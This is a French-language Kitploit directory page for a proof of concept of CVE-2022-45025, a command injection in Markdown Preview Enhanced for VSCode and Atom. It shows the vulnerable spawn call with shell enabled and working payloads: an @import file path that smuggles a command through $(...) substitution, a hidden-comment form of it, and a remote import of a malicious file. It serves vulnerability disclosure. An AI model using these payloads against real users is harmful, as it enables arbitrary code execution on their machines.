Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2022-45025 — [PoC] Injection de commandes via l'import PDF dans Markdown Preview Enhanced (VSCode, Atom) | Kitploit
Outils/GitHubGitHub/yuriisanin/cve-2022-45025
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionCommandement et Contrôle
GitHubyuriisanin/cve-2022-45025

CVE-2022-45025

[PoC] Injection de commandes via l'import PDF dans Markdown Preview Enhanced (VSCode, Atom)

Voir le dépôt
88171il y a 3 ansVérifié par Kitploit

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2022-45025

Injection de commande via l'import PDF dans Markdown Preview Enhanced (VSCode, Atom)

Description

La bibliothèque d'outils Markdown Mume était vulnérable à une injection de commande en raison de l'utilisation de la commande spawn avec l'option {shell: true}. Cela pourrait permettre à un attaquant d'exécuter du code arbitraire en trompant la victime pour qu'elle ouvre un fichier Markdown spécialement conçu avec VSCode ou Atom. La bibliothèque alimente le plugin Markdown Preview Enhanced pour VSCode et Atom.

Vulnérable extrait de code :

root@kitploit:~
const task = spawn(
      "pdf2svg",
      [
        `"${pdfFilePath}"`,
        `"${path.resolve(svgDirectoryPath, svgFilePrefix + "%d.svg")}"`,
        "all",
      ],
      { shell: true },
    )

Preuve de concept

Le document Markdown suivant permet à un attaquant d'exécuter une commande arbitraire :

root@kitploit:~
@import "$(open -a Calculator > /dev/null | exit 0)hello.pdf"

The following comment will be recognised by MPE as valid "@import" command:

<!-- @import "$(open -a Calculator > /dev/null | exit 0)hello.pdf" -->

Alternativement, la charge utile pourrait être exécutée depuis une source externe :

root@kitploit:~
<!-- @import "https://raw.githubusercontent.com/yuriisanin/CVE-2022-45025/main/examples/malicious.md" -->

DÉMO pour VSCode et Atom sur YouTube.

vscode-rce-poc-gif

Support

Vous pouvez me suivre sur Twitter, GitHub ou YouTube.

Télécharger l’outil